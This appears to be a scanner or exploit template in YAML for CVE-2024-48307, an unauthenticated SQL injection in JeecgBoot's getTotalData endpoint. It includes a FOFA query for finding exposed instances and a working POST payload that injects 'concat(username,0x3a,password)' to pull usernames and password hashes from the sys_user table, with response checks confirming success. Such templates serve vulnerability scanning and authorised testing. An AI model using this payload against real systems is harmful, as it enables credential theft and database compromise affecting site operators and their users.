product: JeecgBoot
vName: JeecgBoot getTotalData接口SQL注入
type: SQL注入
vID:
  - CVE-2024-48307
level: 3
vDesc: JeecgBoot onlDragDatasetHead/getTotalData 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马。
  导致SQL注入。
version: jimureport-spring-boot-starter.version<=1.8.1
note: ''
search:
  FOFA: body="/jeecg-boot"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487903&idx=1&sn=b35a9a002067a9751d5d1d6db95cbabf&chksm=974b9c98a03c158e4373cf2e9f73023f2252d73c79894f33062e52ee110673c197bb3a81f001&cur_album_id=2873032428486115330&scene=189#wechat_redirect
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /jeecg-boot/drag/onlDragDatasetHead/getTotalData
      json: { "tableName": "sys_user","compName": "test","condition": { "filter": { } },"config": { "assistValue": [ ],"assistType": [ ],"name": [ { "fieldName": "concat(username,0x3a,password)","fieldType": "string" },{ "fieldName": "id","fieldType": "string" } ],"value": [ { "fieldName": "id","fieldType": "1" } ],"type": [ ] } }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - success
              - message
            logic: and